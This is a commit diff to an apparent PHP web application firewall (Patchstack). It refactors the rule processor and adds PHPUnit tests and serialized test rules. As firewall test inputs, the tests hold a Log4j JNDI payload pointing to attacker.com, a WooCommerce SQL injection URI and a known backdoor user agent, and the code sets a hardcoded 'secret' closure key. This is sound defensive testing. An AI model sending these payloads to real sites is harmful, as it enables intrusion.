Added some comments. Some minor performance improvements. Added new firewall engine rules for tests. Added request tests. Added new firewall engine tests.

Author: dave83649

src/Extensions/Test/Extension.php

@@ -64,7 +64,7 @@ public function getIpAddress()
     }
 
     /**
-     * Determine if the request should be passed without going through the firewall.
+     * Determine if the request should not go through the firewall.
      * 
      * @param array $whitelistRules
      * @param array $request

src/Processor.php

@@ -101,44 +101,49 @@ public function __get($name)
 
 	/**
 	 * Launch the firewall. First we determine if the user is blocked and whitelisted, then go through
-	 * all of the firewall rules
+	 * all of the firewall rules.
 	 * 
-	 * @return void
+	 * Will return true if $mustExit is false and all of the rules were processed without a positive detection.
+	 * 
+	 * @param boolean $mustExit
+	 * @return boolean
 	 */
-	public function launch()
+	public function launch($mustExit = true)
 	{
-		// Determine if we have any firewall rules loaded.
-		if (count($this->firewallRules) == 0) {
-			return;
-		}
-
 		// Determine if the user is temporarily blocked from the site before we do anything else.
 		if ($this->extension->isBlocked($this->autoblockMinutes, $this->autoblockTime, $this->autoblockAttempts) && !$this->extension->canBypass()) {
 			$this->extension->forceExit(22);
 		}
 
-		// Since the Opis/Closure package does not support PHP 8.1+,
-		// we have to use Laravel's ported version for 8.1+.
-		if (PHP_VERSION_ID < 80100) {
-			require dirname(__FILE__) . '/../vendor/closure/vendor/autoload.php';
-		} else {
-			require dirname(__FILE__) . '/../vendor/serializable-closure/vendor/autoload.php';
-		}
-
 		// Check for whitelist.
 		$request  = $this->request->capture();
 		if ($this->extension->isWhitelisted($this->whitelistRules, $request)) {
-			return;
+			return true;
 		}
 
+		// Grab the IP address of the request.
+		$ip = $this->extension->getIpAddress();
+
 		// Run the legacy firewall rules processor for backwards compatibility.
 		if (count($this->firewallRulesLegacy) > 0){
-			$this->legacyProcessor();
+			$this->launchLegacy(true, $request, $ip);
 		}
 
-		$ip = $this->extension->getIpAddress();
+		// Determine if we have any firewall rules loaded.
+		if (count($this->firewallRules) == 0) {
+			return true;
+		}
+
+		// Since the Opis/Closure package does not support PHP 8.1+,
+		// we have to use Laravel's ported version for 8.1+.
+		if (PHP_VERSION_ID < 80100) {
+			require dirname(__FILE__) . '/../vendor/closure/vendor/autoload.php';
+		} else {
+			require dirname(__FILE__) . '/../vendor/serializable-closure/vendor/autoload.php';
+		}
+		
 		SerializableClosure::setSecretKey('secret');
-	
+
 		foreach ($this->firewallRules as $rule) {
 
 			// Get the firewall rule and extract it.
@@ -169,28 +174,38 @@ public function launch()
 			// Determine what action to perform.
 			if ($rule->type == 'BLOCK') {
 				$this->extension->logRequest($rule->id, $request, 'BLOCK');
-				$this->extension->forceExit($rule->id);
+
+				// Do we have to exit the page or simply return false?
+				if($mustExit){
+					$this->extension->forceExit($rule->id);
+				}else{
+					return false;
+				}
 			} elseif ($rule->type == 'LOG') {
 				$this->extension->logRequest($rule->id, $request, 'LOG');
 			} elseif ($rule->type == 'REDIRECT') {
 				$this->extension->logRequest($rule->id, $request, 'REDIRECT');
-				$this->response->redirect($rule->type_params);
-				exit;
+				$this->response->redirect($rule->type_params, $mustExit);
 			}
 		}
+
+		return true;
 	}
 
 	/**
 	 * The legacy firewall processor will only iterate over the general firewall rules.
-	 * Returns true if all rules were passed. False if any rule was hit.
+	 * Will return true if $mustExit is false and all of the rules were processed without a positive detection.
 	 * 
+	 * @param boolean $mustExit
+	 * @param array $request
+	 * @param string $ip
 	 * @return boolean
 	 */
-	public function legacyProcessor($mustExit = true)
+	public function launchLegacy($mustExit = true, $request = array(), $ip = '')
 	{
-		// Obtain the IP address and request data.
-		$client_ip = $this->extension->getIpAddress();
-		$requests  = $this->request->capture();
+		// Obtain the IP address and request data if it has not been supplied yet.
+		$client_ip = $ip == '' ? $this->extension->getIpAddress() : $ip;
+		$requests  = count($request) == 0 ? $this->request->capture() : $request;
 
 		// Iterate through all root objects.
 		foreach ($this->firewallRulesLegacy as $firewall_rule) {

src/Request.php

@@ -192,8 +192,13 @@ public function captureKeys()
 			'GET'  => $_GET,
 		);
 
+		// No need to continue if the option does not exist.
+		if(!isset($this->options['whitelistKeysRules'])){
+			return $data;
+		}
+
 		// Determine if there are any keys we should remove from the data set.
-		if (count($this->options['whitelistKeysRules']) == 0 || !is_array($this->options['whitelistKeysRules'])) {
+		if (!is_array($this->options['whitelistKeysRules']) || count($this->options['whitelistKeysRules']) == 0) {
 			return $data;
 		}
 

tests/FirewallLegacyTest.php

@@ -34,6 +34,7 @@ protected function setUp(): void
     private function setUpFirewallProcessor(array $rules)
     {
         $this->processor = new Processor(
+            [],
             $rules,
             [],
             [],
@@ -65,7 +66,7 @@ private function alterPayload(array $payload = [])
     public function testAllRules()
     {
         $this->setUpFirewallProcessor($this->rules);
-        $this->assertTrue($this->processor->legacyProcessor());
+        $this->assertTrue($this->processor->launchLegacy());
     }
 
     /**
@@ -88,7 +89,7 @@ public function testXSS()
             $this->alterPayload(['GET' => [
                 'q' => $payload
             ]]);
-            $this->assertFalse($this->processor->legacyProcessor(false), 'Testing XSS failed with payload: ' . $payload);
+            $this->assertFalse($this->processor->launchLegacy(false), 'Testing XSS failed with payload: ' . $payload);
         }
     }
 
@@ -112,7 +113,7 @@ public function testSQLI()
             $this->alterPayload(['GET' => [
                 'q' => $payload
             ]]);
-            $this->assertFalse($this->processor->legacyProcessor(false), 'Testing SQLI failed with payload: ' . $payload);
+            $this->assertFalse($this->processor->launchLegacy(false), 'Testing SQLI failed with payload: ' . $payload);
         }
     }
 
@@ -136,7 +137,7 @@ public function testLFI()
             $this->alterPayload(['GET' => [
                 'q' => $payload
             ]]);
-            $this->assertFalse($this->processor->legacyProcessor(false), 'Testing LFI failed with payload: ' . $payload);
+            $this->assertFalse($this->processor->launchLegacy(false), 'Testing LFI failed with payload: ' . $payload);
         }
     }
 
@@ -153,12 +154,12 @@ public function testWordPressSpecific()
         $this->alterPayload(['GET' => [
             'action' => 'fs_retry_connectivity_test_'
         ]]);
-        $this->assertFalse($this->processor->legacyProcessor(false));
+        $this->assertFalse($this->processor->launchLegacy(false));
 
         // Block AccessPress backdoor through user-agent.
         $_SERVER['HTTP_USER_AGENT'] = 'wp_is_mobile';
         $this->alterPayload();
-        $this->assertFalse($this->processor->legacyProcessor(false));
+        $this->assertFalse($this->processor->launchLegacy(false));
         $_SERVER['HTTP_USER_AGENT'] = '';
 
         // Block Apache Log4j vulnerability.
@@ -167,12 +168,12 @@ public function testWordPressSpecific()
                 'q' => '${jndi:ldap://attacker.com/reference}'
             ]
         ]);
-        $this->assertFalse($this->processor->legacyProcessor(false));
+        $this->assertFalse($this->processor->launchLegacy(false));
 
         // Block WooCommerce SQL injection.
         $this->alterPayload();
         $_SERVER['REQUEST_URI'] = '/wp-json/wc/store/products/collection-data?calculate_attribute_counts\[\]\[query_type\]=and&calculate_attribute_counts\[\]\[taxonomy\]=poc%252522%252529%252520OR%252520SLEEP%2525281%252529%252523';
-        $this->assertFalse($this->processor->legacyProcessor(false));
+        $this->assertFalse($this->processor->launchLegacy(false));
         $_SERVER['REQUEST_URI'] = '';
     }
 }

tests/FirewallTest.php

@@ -0,0 +1,92 @@
+<?php declare(strict_types=1);
+use PHPUnit\Framework\TestCase;
+use Patchstack\Processor;
+use Patchstack\Extensions\Test\Extension;
+
+final class FirewallTest extends TestCase
+{
+    /**
+     * @var Processor
+     */
+    protected $processor;
+
+    /**
+     * @var array
+     */
+    protected $rules;
+
+    /**
+     * Setup the test for testing the header location redirect.
+     * 
+     * @return void
+     */
+    protected function setUp(): void
+    {
+        $this->rules = json_decode(file_get_contents(dirname(__FILE__) . '/data/Rules.json'));
+    }
+
+    /**
+     * Setup the firewall processor.
+     * 
+     * @param array $rules
+     * @return void
+     */
+    private function setUpFirewallProcessor(array $rules)
+    {
+        $this->processor = new Processor(
+            $rules,
+            [],
+            [],
+            [],
+            new Extension
+        );
+    }
+
+    /**
+     * Alters the payload between tests.
+     * For most firewall rules there's no difference if testing against GET or POST.
+     * Therefore, both can be used for testing payloads.
+     * 
+     * @return void
+     */
+    private function alterPayload(array $payload = [])
+    {
+        $_POST = [];
+        $_GET = [];
+
+        $_POST = isset($payload['POST']) ? $payload['POST'] : [];
+        $_GET = isset($payload['GET']) ? $payload['GET'] : [];
+    }
+
+    /**
+     * Test specific firewall rules.
+     * 
+     * @return void
+     */
+    public function testRules()
+    {
+        // Block request with test parameter present in the URL.
+        $this->setUpFirewallProcessor([$this->rules[0]]);
+        $this->alterPayload(['GET' => [
+            'test' => 'yes'
+        ]]);
+        $this->assertFalse($this->processor->launch(false));
+
+        // Block request with backdoor parameter in payload set to "mybackdoor" and user agent containing "some_backdoor_agent".
+        $this->setUpFirewallProcessor([$this->rules[1]]);
+        $this->alterPayload(['POST' => [
+            'backdoor' => 'mybackdoor'
+        ]]);
+        $_SERVER['HTTP_USER_AGENT'] = 'Chrome some_backdoor_agent Edge';
+        $this->assertFalse($this->processor->launch(false));
+        $_SERVER['HTTP_USER_AGENT'] = '';
+
+        // Block a base64 json encoded request in the payload parameter with the user_role parameter set to "administrator".
+        $this->setUpFirewallProcessor([$this->rules[2]]);
+        $payload = base64_encode(json_encode(['user_role' => 'administrator']));
+        $this->alterPayload(['POST' => [
+            'payload' => $payload
+        ]]);
+        $this->assertFalse($this->processor->launch(false));
+    }
+}

tests/RequestTest.php

@@ -0,0 +1,62 @@
+<?php declare(strict_types=1);
+use PHPUnit\Framework\TestCase;
+use Patchstack\Request;
+
+final class RequestTest extends TestCase
+{
+    /**
+     * @var Request
+     */
+    private $request;
+
+    /**
+     * Setup the test for testing the requesting variables.
+     * 
+     * @return void
+     */
+    public function setUp(): void
+    {
+        $_SERVER['HTTP_USER_AGENT'] = 'This is a user agent';
+        $_SERVER['REQUEST_URI'] = '/somepage.php';
+        $_SERVER['REQUEST_METHOD'] = 'GET';
+
+        $_GET['something'] = 'testing123';
+        $_POST['else'] = 'foobar';
+
+        $request = new Request([]);
+        $this->request = $request->capture();
+    }
+
+    /**
+     * Test different request variables.
+     */
+    public function testRequestCaptureHeaders()
+    {
+        // Test for HTTP user agent.
+        foreach($this->request['rulesHeadersCombinations'] as $header){
+            if(stripos($header, 'User-Agent:') !== false){
+                $this->assertTrue($header == 'User-Agent: This is a user agent');
+            }
+        }
+
+        // Test for the requesting URL.
+        $this->assertTrue($this->request['rulesUri'] == '/somepage.php');
+
+        // Test for the requesting method.
+        $this->assertTrue($this->request['method'] == 'GET');
+
+        // Test for URL query parameter.
+        foreach($this->request['rulesParamsCombinations'] as $parameter){
+            if(stripos($parameter, 'something=') !== false){
+                $this->assertTrue($parameter == 'something=testing123');
+            }
+        }
+
+        // Test for POST payload parameter.
+        foreach($this->request['rulesBodyCombinations'] as $parameter){
+            if(stripos($parameter, 'something=') !== false){
+                $this->assertTrue($parameter == 'else=foobar');
+            }
+        }
+    }
+}

tests/data/Rules.json

@@ -0,0 +1,24 @@
+[
+    {
+        "id":1,
+        "title":"Block test parameter being present in the URL","rule":"QzozMjoiT3Bpc1xDbG9zdXJlXFNlcmlhbGl6YWJsZUNsb3N1cmUiOjI5OTp7QExNVWRYZWZmVTlHMzJPUk1EWGlxZGNNby9RaXdpVytnZFNRL1h6K1U3Z3M9LmE6NTp7czozOiJ1c2UiO2E6MTp7czoyOiJpcCI7czo0OiJ0ZXN0Ijt9czo4OiJmdW5jdGlvbiI7czoxMDk6ImZ1bmN0aW9uICgpIHVzZSAoJGlwKXsNCiAgICBpZiAoIWlzc2V0KCRfR0VUWyd0ZXN0J10pKSB7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICByZXR1cm4gdHJ1ZTsNCn0iO3M6NToic2NvcGUiO047czo0OiJ0aGlzIjtOO3M6NDoic2VsZiI7czozMjoiMDAwMDAwMDAzMzdmMTY2ZjAwMDAwMDAwM2E3MDNkNjIiO319",
+        "cat":"TEST",
+        "type":"BLOCK",
+        "type_params":null
+    },
+    {
+        "id":2,
+        "title":"Block backdoor parameter in payload set to mybackdoor and user agent containing some_backdoor_agent.","rule":"QzozMjoiT3Bpc1xDbG9zdXJlXFNlcmlhbGl6YWJsZUNsb3N1cmUiOjQ3Mzp7QDhaZi9mUkxHb1FrZUNYVytDaW9OdTN5UXhpVEhvaDFNQnJHbDIwUzhSUTA9LmE6NTp7czozOiJ1c2UiO2E6MTp7czoyOiJpcCI7czo0OiJ0ZXN0Ijt9czo4OiJmdW5jdGlvbiI7czoyODM6ImZ1bmN0aW9uICgpIHVzZSAoJGlwKXsNCiAgICAkdXNlcl9hZ2VudCA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCg0KICAgIGlmKGlzc2V0KCRfUE9TVFsnYmFja2Rvb3InXSkgJiYgJF9QT1NUWydiYWNrZG9vciddID09ICdteWJhY2tkb29yJyl7DQogICAgICAgIGlmKFxzdHJpcG9zKCR1c2VyX2FnZW50LCAnc29tZV9iYWNrZG9vcl9hZ2VudCcpICE9PSBmYWxzZSl7DQogICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgfQ0KICAgIH0NCg0KICAgIHJldHVybiBmYWxzZTsNCn0iO3M6NToic2NvcGUiO047czo0OiJ0aGlzIjtOO3M6NDoic2VsZiI7czozMjoiMDAwMDAwMDAwMzQzZmM3MDAwMDAwMDAwMTE0NTk4YjciO319",
+        "cat":"TEST",
+        "type":"BLOCK",
+        "type_params":null
+    },
+    {
+        "id":3,
+        "title":"Block a base64 json encoded request with the user_role parameter set to administrator",
+        "rule":"QzozMjoiT3Bpc1xDbG9zdXJlXFNlcmlhbGl6YWJsZUNsb3N1cmUiOjQ0MDp7QElQZmkzenkwekxKZnpEUE10b3g3aloyNXlkQkczTStBWHFGcVVjaVBtejA9LmE6NTp7czozOiJ1c2UiO2E6MTp7czoyOiJpcCI7czo0OiJ0ZXN0Ijt9czo4OiJmdW5jdGlvbiI7czoyNTA6ImZ1bmN0aW9uICgpIHVzZSAoJGlwKXsNCiAgICBpZighaXNzZXQoJF9QT1NUWydwYXlsb2FkJ10pKXsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCg0KICAgICRwYXlsb2FkID0gXGpzb25fZGVjb2RlKFxiYXNlNjRfZGVjb2RlKCRfUE9TVFsncGF5bG9hZCddKSwgdHJ1ZSk7DQogICAgcmV0dXJuIGlzc2V0KCRwYXlsb2FkWyd1c2VyX3JvbGUnXSkgJiYgJHBheWxvYWRbJ3VzZXJfcm9sZSddID09ICdhZG1pbmlzdHJhdG9yJzsNCn0iO3M6NToic2NvcGUiO047czo0OiJ0aGlzIjtOO3M6NDoic2VsZiI7czozMjoiMDAwMDAwMDA2OGFlMzAwYjAwMDAwMDAwNWY0NDg5OTIiO319",
+        "cat":"TEST",
+        "type":"BLOCK",
+        "type_params":null
+    }
+]